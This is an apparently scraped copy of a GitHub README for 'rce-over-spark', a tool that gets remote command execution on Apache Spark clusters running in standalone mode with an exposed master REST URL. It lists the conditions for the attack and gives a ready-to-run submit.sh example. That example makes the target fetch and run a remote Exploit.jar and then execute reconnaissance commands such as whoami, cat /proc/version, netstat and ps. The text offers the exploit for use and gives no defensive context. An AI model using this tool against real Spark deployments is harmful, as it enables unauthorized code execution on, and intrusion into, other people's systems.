GitHub - aRe00t/rce-over-spark: Remote Command Execution Over Spark
2019-08-31 00:52:34 Author: github.com(查看原文) 阅读量:274 收藏

Join GitHub today

GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.

Sign up

Remote Command Execution Over Spark

Java Shell

Conditions

  1. Spark is running on Standalone Mode.
  2. REST URL of Master is accessible.

How to use

./submit.sh spark_rest_url spark_version jar_url commands

Example

./submit.sh \
1.1.1.1:6066 \
2.2.0 \
https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar \
"whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"

Result

Good Luck!


文章来源: https://github.com/aRe00t/rce-over-spark
如有侵权请联系:admin#unsafe.sh